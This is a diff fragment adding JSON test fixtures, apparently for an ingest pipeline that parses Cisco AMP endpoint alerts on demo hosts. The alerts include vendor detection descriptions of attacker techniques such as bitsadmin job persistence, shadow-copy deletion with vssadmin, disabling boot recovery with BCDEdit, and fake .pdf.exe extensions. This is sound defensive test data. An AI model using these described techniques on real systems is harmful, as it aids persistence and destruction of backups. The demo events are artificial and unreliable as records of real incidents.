+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.Bitsadmin.ioc",
+                        "description": "Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"
+                }
+            },
+            "@timestamp": "2021-01-14T10:05:50.000Z",
+            "file": {
+                "name": "WScript.exe",
+                "path": "/C:/Windows/System32/WScript.exe",
+                "hash": {
+                    "sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Threat_Quarantined"
+                ],
+                "hash": [
+                    "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Quarantined",
+                "hostname": "Demo_AMP_Threat_Quarantined"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701355274Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739846959000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":846943000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.\",\"short_description\":\"W32.WScriptLaunchedZippedJS.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-14T10:05:50.000Z",
+                "action": "Cloud IOC",
+                "id": "1521138739846959000",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "24:78:d8:fd:c4:75",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "24:78:d8:fd:c4:75"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.WScriptLaunchedZippedJS.ioc",
+                        "description": "Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"
+                }
+            },
+            "@timestamp": "2021-01-14T10:04:56.000Z",
+            "file": {
+                "name": "vssadmin.exe",
+                "path": "/C:/windows/system32/vssadmin.exe",
+                "hash": {
+                    "sha256": "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701357412Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576726048000300,\"timestamp\":1610618696,\"timestamp_nanoseconds\":48000000,\"date\":\"2021-01-14T10:04:56+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618696,\"start_date\":\"2021-01-14T10:04:56+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"/C:/windows/system32/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-14T10:04:56.000Z",
+                "action": "Cloud IOC",
+                "id": "1494576726048000300",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.PossibleRansomwareShadowCopyDeletion.ioc",
+                        "description": "Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                }
+            },
+            "@timestamp": "2021-01-14T10:04:49.000Z",
+            "file": {
+                "name": "cmd.exe",
+                "path": "/C:/windows/system32/cmd.exe",
+                "hash": {
+                    "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 1,
+                "ingested": "2021-09-12T17:32:35.701359314Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576727672000300,\"timestamp\":1610618689,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-14T10:04:49+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610618689,\"start_date\":\"2021-01-14T10:04:49+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.\",\"short_description\":\"W32.BCDEditDisableRecovery.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-14T10:04:49.000Z",
+                "action": "Cloud IOC",
+                "id": "1494576727672000300",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.BCDEditDisableRecovery.ioc",
+                        "description": "The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"
+                }
+            },
+            "@timestamp": "2021-01-14T10:03:40.000Z",
+            "file": {
+                "name": "report.pdf.exe",
+                "path": "/c:/users/rsteadman/downloads/report.pdf.exe",
+                "hash": {
+                    "sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Low_Prev_Retro"
+                ],
+                "hash": [
+                    "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Low_Prev_Retro",
+                "hostname": "Demo_Low_Prev_Retro"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701361216Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458617561791000300,\"timestamp\":1610618620,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T10:03:40+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618620,\"start_date\":\"2021-01-14T10:03:40+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.\",\"short_description\":\"W32.FakeExtensionExec.RET\"},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"/c:/users/rsteadman/downloads/report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-14T10:03:40.000Z",
+                "action": "Cloud IOC",
+                "id": "1458617561791000300",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "df:d1:ed:2d:c8:fc",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "df:d1:ed:2d:c8:fc"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.FakeExtensionExec.RET",
+                        "description": "A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T10:01:51.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_BP_WMIPRVSE"
+                ],
+                "hash": [
+                    "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_BP_WMIPRVSE",
+                "hostname": "Demo_BP_WMIPRVSE"
+            },
+            "event": {
+                "severity": 2,
+                "action": "Quarantine Failure",
+                "ingested": "2021-09-12T17:32:35.701363103Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
+                "id": "6880587034675643000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "be:b0:d5:89:e2:96",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Unknown",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "be:b0:d5:89:e2:96"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object path not found",
+                        "error_code": 3221225530
+                    },
+                    "detection_id": "6880587034675642558",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T10:01:51.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_BP_WMIPRVSE"
+                ],
+                "hash": [
+                    "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_BP_WMIPRVSE",
+                "hostname": "Demo_BP_WMIPRVSE"
+            },
+            "event": {
+                "severity": 2,
+                "action": "Quarantine Failure",
+                "ingested": "2021-09-12T17:32:35.701365008Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
+                "id": "6880587034675643000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "be:b0:d5:89:e2:96",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Unknown",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "be:b0:d5:89:e2:96"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object path not found",
+                        "error_code": 3221225530
+                    },
+                    "detection_id": "6880587034675642558",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T10:01:51.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_BP_WMIPRVSE"
+                ],
+                "hash": [
+                    "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_BP_WMIPRVSE",
+                "hostname": "Demo_BP_WMIPRVSE"
+            },
+            "event": {
+                "severity": 2,
+                "action": "Quarantine Failure",
+                "ingested": "2021-09-12T17:32:35.701366987Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
+                "id": "6880587034675643000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "be:b0:d5:89:e2:96",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Unknown",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "be:b0:d5:89:e2:96"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object path not found",
+                        "error_code": 3221225530
+                    },
+                    "detection_id": "6880587034675642558",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T10:01:51.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_BP_WMIPRVSE"
+                ],
+                "hash": [
+                    "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_BP_WMIPRVSE",
+                "hostname": "Demo_BP_WMIPRVSE"
+            },
+            "event": {
+                "severity": 2,
+                "action": "Quarantine Failure",
+                "ingested": "2021-09-12T17:32:35.701368848Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
+                "id": "6880587034675643000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "be:b0:d5:89:e2:96",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Unknown",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "be:b0:d5:89:e2:96"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object path not found",
+                        "error_code": 3221225530
+                    },
+                    "detection_id": "6880587034675642558",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
